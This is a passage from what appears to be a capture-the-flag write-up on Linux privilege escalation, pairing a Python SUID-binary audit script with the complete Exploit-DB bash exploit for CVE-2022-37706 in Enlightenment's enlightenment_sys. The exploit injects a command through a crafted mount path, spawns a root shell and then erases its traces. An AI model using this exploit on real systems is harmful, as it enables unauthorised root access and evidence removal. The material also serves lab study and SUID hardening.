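    "/usr/bin/umount", "/usr/bin/newgrp", "/usr/bin/chfn", "/usr/bin/chsh",
    "/usr/bin/gpasswd", "/usr/bin/fusermount",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Constructed from the linpeas SUID/SGID sections shown above.
SAMPLE_LINES = [
    "-rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)",
    "-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)",
    "-rwsr-xr-- 1 root dip 386K Jul 23 2020 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)",
    "-rwsr-xr-x 1 root root 163K Apr 4 2023 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable",
    "-rwsr-xr-x 1 root root 67K Apr 9 08:34 /usr/bin/su",
    "-rwxr-sr-x 1 root shadow 43K Jan 10 05:55 /usr/sbin/unix_chkpwd",
]


def parse_ls_line(line):
    """Split one `ls -l` line into (mode, owner, group, path).

    linpeas appends annotations (' ---> ...', ' (Unknown SUID binary!)')
    after the path; they are stripped. Returns None for non-file lines.
    """
    parts = line.split(None, 8)
    if len(parts) < 9 or not parts[0].startswith("-"):
        return None
    mode, owner, group, rest = parts[0], parts[2], parts[3], parts[8]
    path = rest.split(" --->", 1)[0].split(" (", 1)[0].strip()
    return mode, owner, group, path


def is_setuid(mode):
    """True if the owner-execute slot carries the setuid bit ('s' or 'S')."""
    return len(mode) == 10 and mode[3] in "sS"


def audit_suid(lines, baseline=BASELINE):
    """Return (path, group, world_executable) for root setuid binaries
    outside the baseline. SGID-only entries are deliberately skipped."""
    findings = []
    for line in lines:
        parsed = parse_ls_line(line)
        if parsed is None:
            continue
        mode, owner, group, path = parsed
        if is_setuid(mode) and owner == "root" and path not in baseline:
            findings.append((path, group, mode[9] == "x"))
    return findings


def remediation(findings):
    """Hardening command per finding: drop the setuid bit until the
    binary's need for it has been justified and its version checked."""
    return [f"chmod u-s {path}" for path, _group, _world in findings]


if __name__ == "__main__":
    for path, group, world in audit_suid(SAMPLE_LINES):
        reach = "any local user" if world else f"group {group}"
        print(f"unexpected setuid root binary: {path} (reachable by {reach})")
```

The same check can be fed live output with `find / -perm -4000 -type f -exec ls -l {} +`; on this box it narrows the review straight to the four enlightenment helpers.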
CVE-2022-37706
Investigating that binary turns up the following Exploit-DB entry.
Let's exploit with it.
However, the script will not run if simply copy-pasted, so I remove the stray line breaks as follows.
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Welcome to the rabbit hole :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
read -p "Press any key to clean the evedence..."
echo -e "Please wait... "
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"
Summary
With this, privilege escalation succeeded and root was obtained.
I think this box was an Easy that genuinely felt like an Easy.
As always, I hope this is of help to fellow security engineers.